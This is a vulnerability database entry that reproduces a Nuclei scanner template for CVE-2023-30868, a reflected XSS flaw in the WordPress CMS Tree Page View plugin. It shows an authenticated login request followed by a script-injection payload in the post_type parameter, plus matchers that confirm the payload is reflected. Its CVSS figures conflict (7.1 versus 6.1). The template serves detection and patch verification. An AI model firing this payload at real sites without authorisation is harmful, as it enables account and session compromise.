Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-30868
HistoryOct 17, 2023 - 7:20 a.m.

Tree Page View Plugin < 1.6.7 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
12
cve2023
wpscan
packetstorm
xss
authenticated
exploitdb
cms_tree_page_view_project
wordpress

7.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

0.001 Low

EPSS

Percentile

49.8%

The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
id: CVE-2023-30868

info:
  name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.
  reference:
    - https://www.exploit-db.com/exploits/51507
    - https://wpscan.com/vulnerability/407c62af-8e2d-441d-8332-0afad5d07014
    - https://nvd.nist.gov/vuln/detail/CVE-2023-30868
    - http://packetstormsecurity.com/files/172730/WordPress-Tree-Page-View-1.6.7-Cross-Site-Scripting.html
    - https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-30868
    cwe-id: CWE-79
    epss-score: 0.00114
    epss-percentile: 0.44861
    cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cms_tree_page_view_project
    product: cms_tree_page_view
    framework: wordpress
  tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E") && contains(body_2, "CMS Tree Page View")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a004730450220190481a719136316c9ba89f9f2939e193e19bd3ed466d8d7e2e0a1c8d83f4eab0221009305805e4a7c444a33913a5937a05df99836aebb8cbe484b636680272ddbde7f:922c64590222798bb761d5b6d8e72950

7.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

0.001 Low

EPSS

Percentile

49.8%